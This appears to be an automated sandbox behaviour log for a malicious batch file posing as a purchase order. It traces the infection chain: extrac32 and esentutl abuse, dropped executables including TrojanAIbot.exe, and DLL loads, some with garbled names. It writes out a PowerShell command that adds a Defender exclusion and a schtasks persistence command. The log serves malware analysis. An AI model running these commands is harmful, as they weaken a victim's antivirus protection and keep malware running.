Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\extrac32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat ReversingLabs: Detection: 23%
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFF65.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: unknown Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" " Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFF65.tmp.cmd"" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: url.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: spp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winhttpcom.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??????????.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??????????.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??????????.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ???e???????????.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ???e???????????.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: tquery.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppwmi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppcext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winscard.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppc.dll Jump to behavior
